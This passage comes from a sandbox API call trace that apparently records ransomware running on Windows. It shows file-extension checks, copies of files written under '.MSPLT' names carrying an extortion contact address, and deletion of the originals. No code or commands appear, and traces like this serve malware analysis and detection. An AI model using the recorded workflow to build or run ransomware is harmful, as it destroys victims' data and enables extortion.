(lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".jpg") returned 4 [0174.332] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".doc") returned 4 [0174.333] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0174.333] lstrlenW (lpString=".docx") returned 5 [0174.333] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0174.333] lstrlenW (lpString=".pdf") returned 4 [0174.333] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0174.333] lstrlenW (lpString=".xls") returned 4 [0174.333] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0174.333] lstrlenW (lpString=".xlsx") returned 5 [0174.333] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0174.333] lstrlenW (lpString=".ppt") returned 4 [0174.333] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0174.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.333] lstrlenW (lpString=".zip") returned 4 [0174.333] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0174.333] lstrlenW (lpString=".rar") returned 4 [0174.333] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0174.333] lstrlenW (lpString=".bz2") returned 4 [0174.333] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0174.333] lstrlenW (lpString=".7z") returned 3 [0174.333] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0174.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.333] lstrlenW (lpString=".dbf") returned 4 [0174.333] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0174.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.333] lstrlenW (lpString=".1cd") returned 4 [0174.333] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0174.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.333] lstrlenW (lpString=".jpg") returned 4 [0174.333] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0174.333] lstrcmpiW (lpString1=".htm", lpString2=".MSPLT") returned -1 [0174.333] lstrlenW (lpString="Hand Prints.htm") returned 15 [0174.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.337] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=235) returned 1 [0174.337] CloseHandle (hObject=0x374) returned 1 [0174.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0174.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.338] lstrlenW (lpString=".doc") returned 4 [0174.338] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0174.338] lstrlenW (lpString=".docx") returned 5 [0174.338] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0174.338] lstrlenW (lpString=".pdf") returned 4 [0174.338] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0174.338] lstrlenW (lpString=".xls") returned 4 [0174.338] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0174.338] lstrlenW (lpString=".xlsx") returned 5 [0174.338] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0174.338] lstrlenW (lpString=".ppt") returned 4 [0174.338] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0174.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.338] lstrlenW (lpString=".zip") returned 4 [0174.338] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0174.338] lstrlenW (lpString=".rar") returned 4 [0174.338] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0174.338] lstrlenW (lpString=".bz2") returned 4 [0174.339] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0174.339] lstrlenW (lpString=".7z") returned 3 [0174.339] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString=".dbf") returned 4 [0174.339] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString=".1cd") returned 4 [0174.339] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString=".jpg") returned 4 [0174.339] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString=".doc") returned 4 [0174.339] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0174.339] lstrlenW (lpString=".docx") returned 5 [0174.339] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0174.339] lstrlenW (lpString=".pdf") returned 4 [0174.339] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString=".xls") returned 4 [0174.339] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString=".xlsx") returned 5 [0174.339] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0174.339] lstrlenW (lpString=".ppt") returned 4 [0174.339] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.339] lstrlenW (lpString=".zip") returned 4 [0174.339] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString=".rar") returned 4 [0174.339] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0174.339] lstrlenW (lpString=".bz2") returned 4 [0174.339] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0174.339] lstrlenW (lpString=".7z") returned 3 [0174.340] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0174.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.340] lstrlenW (lpString=".dbf") returned 4 [0174.340] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0174.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.340] lstrlenW (lpString=".1cd") returned 4 [0174.769] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0174.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 73 [0174.769] lstrlenW (lpString=".jpg") returned 4 [0174.769] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0174.769] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.769] lstrlenW (lpString="win32_CopyDrop32x32.gif") returned 23 [0174.769] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.771] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=165) returned 1 [0174.771] CloseHandle (hObject=0x350) returned 1 [0174.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 0x20 [0174.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.771] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.771] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.771] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.771] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.772] GetLastError () returned 0x0 [0174.772] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xa5, lpOverlapped=0x0) returned 1 [0174.773] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xb0, lpOverlapped=0x0) returned 1 [0174.774] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0174.774] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x102, lpOverlapped=0x0) returned 1 [0174.775] SetEndOfFile (hFile=0x2e8) returned 1 [0174.775] CloseHandle (hObject=0x2e8) returned 1 [0174.778] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.779] SetEndOfFile (hFile=0x350) returned 1 [0174.780] CloseHandle (hObject=0x350) returned 1 [0174.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.780] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 1 [0174.781] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.781] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.781] lstrlenW (lpString=".doc") returned 4 [0174.781] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.781] lstrlenW (lpString=".docx") returned 5 [0174.781] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.781] lstrlenW (lpString=".pdf") returned 4 [0174.781] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.781] lstrlenW (lpString=".xls") returned 4 [0174.781] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.781] lstrlenW (lpString=".xlsx") returned 5 [0174.781] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.781] lstrlenW (lpString=".ppt") returned 4 [0174.781] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.781] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.781] lstrlenW (lpString=".zip") returned 4 [0174.781] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.781] lstrlenW (lpString=".rar") returned 4 [0174.781] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.781] lstrlenW (lpString=".bz2") returned 4 [0174.781] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.781] lstrlenW (lpString=".7z") returned 3 [0174.781] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.781] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.781] lstrlenW (lpString=".dbf") returned 4 [0174.781] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.782] lstrlenW (lpString=".1cd") returned 4 [0174.782] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.782] lstrlenW (lpString=".jpg") returned 4 [0174.782] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.782] lstrlenW (lpString=".doc") returned 4 [0174.782] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.782] lstrlenW (lpString=".docx") returned 5 [0174.782] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.782] lstrlenW (lpString=".pdf") returned 4 [0174.782] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString=".xls") returned 4 [0174.782] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString=".xlsx") returned 5 [0174.782] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.782] lstrlenW (lpString=".ppt") returned 4 [0174.782] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.782] lstrlenW (lpString=".zip") returned 4 [0174.782] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString=".rar") returned 4 [0174.782] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.782] lstrlenW (lpString=".bz2") returned 4 [0174.782] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.783] lstrlenW (lpString=".7z") returned 3 [0174.783] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.783] lstrlenW (lpString=".dbf") returned 4 [0174.783] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.783] lstrlenW (lpString=".1cd") returned 4 [0174.783] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0174.783] lstrlenW (lpString=".jpg") returned 4 [0174.783] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.783] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.783] lstrlenW (lpString="win32_CopyNoDrop32x32.gif") returned 25 [0174.783] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.784] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=153) returned 1 [0174.784] CloseHandle (hObject=0x350) returned 1 [0174.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 0x20 [0174.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.784] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.784] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.784] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.784] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.785] GetLastError () returned 0x0 [0174.785] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x99, lpOverlapped=0x0) returned 1 [0174.786] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xa0, lpOverlapped=0x0) returned 1 [0174.787] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0174.787] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x106, lpOverlapped=0x0) returned 1 [0174.788] SetEndOfFile (hFile=0x2e8) returned 1 [0174.788] CloseHandle (hObject=0x2e8) returned 1 [0174.792] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.792] SetEndOfFile (hFile=0x350) returned 1 [0174.850] CloseHandle (hObject=0x350) returned 1 [0174.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.851] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 1 [0174.851] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.851] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.851] lstrlenW (lpString=".doc") returned 4 [0174.851] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.851] lstrlenW (lpString=".docx") returned 5 [0174.851] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.852] lstrlenW (lpString=".pdf") returned 4 [0174.852] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.852] lstrlenW (lpString=".xls") returned 4 [0174.852] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.852] lstrlenW (lpString=".xlsx") returned 5 [0174.852] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.852] lstrlenW (lpString=".ppt") returned 4 [0174.852] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.852] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.852] lstrlenW (lpString=".zip") returned 4 [0174.852] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.852] lstrlenW (lpString=".rar") returned 4 [0174.852] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.852] lstrlenW (lpString=".bz2") returned 4 [0174.852] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.852] lstrlenW (lpString=".7z") returned 3 [0174.852] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.852] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.852] lstrlenW (lpString=".dbf") returned 4 [0174.852] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.852] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.852] lstrlenW (lpString=".1cd") returned 4 [0174.853] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.853] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.853] lstrlenW (lpString=".jpg") returned 4 [0174.853] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.853] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.853] lstrlenW (lpString=".doc") returned 4 [0174.853] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.853] lstrlenW (lpString=".docx") returned 5 [0174.853] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.853] lstrlenW (lpString=".pdf") returned 4 [0174.853] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString=".xls") returned 4 [0174.853] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString=".xlsx") returned 5 [0174.853] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.853] lstrlenW (lpString=".ppt") returned 4 [0174.853] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.853] lstrlenW (lpString=".zip") returned 4 [0174.853] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString=".rar") returned 4 [0174.853] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.853] lstrlenW (lpString=".bz2") returned 4 [0174.853] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.853] lstrlenW (lpString=".7z") returned 3 [0174.854] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.854] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.854] lstrlenW (lpString=".dbf") returned 4 [0174.854] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.854] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.854] lstrlenW (lpString=".1cd") returned 4 [0174.854] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.854] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0174.854] lstrlenW (lpString=".jpg") returned 4 [0174.854] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.854] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.854] lstrlenW (lpString="win32_LinkDrop32x32.gif") returned 23 [0174.854] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), 